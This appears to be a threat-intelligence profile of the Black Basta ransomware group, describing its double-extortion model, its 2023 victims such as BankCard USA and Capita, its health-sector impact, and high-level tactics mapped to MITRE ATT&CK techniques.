Black Basta is a Russian-speaking group that was first spotted in early 2022. It is known for its double extortion attack, where it not only executes ransomware but also exfiltrates sensitive data. If a victim fails to pay a ransom, the group operates a cybercrime marketplace to publicly release the stolen data. The group’s prolific targeting of at least 20 victims in its first two weeks of operation indicates that it is experienced in ransomware and has a steady source of initial access.
The group has been suspected to be a rebrand of the Russian-speaking RaaS threat group Conti, or linked to other Russian-speaking cyber threat groups, due to the level of sophistication by its proficient ransomware operators and reluctance to recruit or advertise on Dark Web forums.
Recent Attacks
In 2023, Black Basta has continued its wave of attacks, targeting various organizations across different sectors. Notably, BankCard USA (BUSA), a provider of end-to-end electronic payment products and services to more than 100,000 American companies, fell victim to Black Basta. The company reportedly paid a $50,000 ransom to the group after a month-long negotiation. Despite assurances of no publication upon payment, some of BUSA’s financial documents and passports were made public.
Other victims in 2023 include the Swiss multinational corporation ABB, UK-based outsourcing company Capita, and Yellow Pages Canada. The attack on Capita is estimated to cost over £15m, demonstrating the significant financial impact of Black Basta’s operations.
Negotiation Tactics and Data Handling
Black Basta’s negotiation tactics involve demanding a high ransom and settling for less after a series of negotiations. However, the group does not always keep its promise of keeping the breach confidential, even after receiving the ransom payment. In the BUSA case, the breach and the ransom payment became public knowledge. The handling of exfiltrated data post-ransom payment remains unclear, raising concerns about the safety of sensitive data even after the ransom has been paid.
Victim’s Response
The response from victims following a breach varies. In the case of BUSA, it’s unclear whether the company notified its customers, employees, or the state of California about the data breach. No notice was posted on the California Attorney General’s site, despite the company being aware of the breach for about a month.
Impact to Health and Public Health (HPH) Sector
Black Basta has already attacked several health and public health sector organizations in 2022, making it a credible threat to the sector. In its first year alone, the group exclusively targeted U.S.-based organizations, seeking to purchase network access credentials for companies specifically located there. The group has affected the websites of specific health information technology, healthcare industry services, laboratory and pharmaceutical, and health plans organizations across multiple states, and has stolen several gigabytes of data on personal identifiable information (PII) for members of health organizations, their customers, and employees.
Impact on Various Sectors
Black Basta poses a significant threat to various sectors. While it has attacked several health and public health sector organizations in 2022, its recent attacks on BUSA and Capita show that it is also a credible threat to the financial and outsourcing sectors.
Common Tactics, Techniques, and Procedures (TTPs)
Black Basta operators utilize unique TTPs to gain entry, spread laterally, exfiltrate data, and drop ransomware. The ransomware is a cross-platform ransomware that is only executed with administrator privileges on both Windows and Linux systems. The group uses stolen credentials (purchased on the Dark Web) to get into organizations’ systems. Initial access is often acquired via malicious links in a phishing e-mail. The group uses numerous tools and remote access methods, including Qakbot (aka QBot), SystemBC, Mimikatz, ColbaltStrike, and Rclone.
- Initial Access: Spearphishing Link (T1192) – This technique involves sending a spearphishing email with a link to a malicious website or payload to the victim. More details can be found on the MITRE ATT&CK website.
- Execution: Scripting (T1064) – This technique involves the use of a script to execute commands on a system. The ransomware executed by Black Basta could be using scripts. More details can be found on the MITRE ATT&CK website.
- Persistence: Valid Accounts (T1078) – This technique involves the use of stolen credentials to maintain access to systems. More details can be found on the MITRE ATT&CK website.
- Lateral Movement: Remote Desktop Protocol (T1076) – This technique involves the use of Remote Desktop Protocol (RDP) to move laterally across a network. More details can be found on the MITRE ATT&CK website.
- Exfiltration: Data Compressed (T1002) – This technique involves compressing data to facilitate exfiltration. More details can be found on the MITRE ATT&CK website.
Relationships
There are speculations that Black Basta may be an offshoot of the Russian-speaking RaaS threat group, Conti, or has some members of the formerly proficient group. Other researchers observed links to the Russian-speaking RaaS threat group, FIN7 (aka Carbanak/Cobalt Group/Carbon Spider). Black Basta has also exhibited similarities to the ransomware group known as BlackMatter.
Download this in Excel format.
Defense and Mitigations
As RaaS threat groups become more prolific, healthcare organizations should remain vigilant and strengthen their defenses against ransomware attacks. Organizations can take several multilayered actions to minimize their exposure to and the potential impact of a ransomware attack.